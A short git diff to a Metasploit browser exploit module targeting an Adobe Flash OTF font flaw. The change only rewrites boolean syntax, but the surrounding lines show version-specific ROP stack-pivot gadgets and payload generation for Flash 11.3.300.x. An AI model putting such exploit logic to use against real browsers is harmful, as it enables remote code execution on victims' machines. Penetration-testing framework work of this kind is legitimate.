diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb index cd1b73f847..e1f1d0072b 100644 --- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb +++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote return p end - if !t['ASLR'] && datastore['ROP'] == 'SWF' && flash_version =~ /11,3,300,257/ + if t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/ print_status("Using Rop Chain For Flash: #{flash_version}") pivot = [ 0x10004171, # POP EDI # POP ESI # RETN (1e0d0000) @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot}) - elsif !t['ASLR'] && datastore['ROP'] == 'SWF' && flash_version =~ /11,3,300,265/ + elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/ print_status("Using Rop Chain For Flash: #{flash_version}") pivot = [ 0x10004171, # POP EDI # POP ESI # RETN (1e0d0000) @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot}) - elsif !t['ASLR'] && datastore['ROP'] == 'SWF' && flash_version =~ /11,3,300,268/ + elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/ print_status("Using Rop Chain For Flash: #{flash_version}") pivot = [ 0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)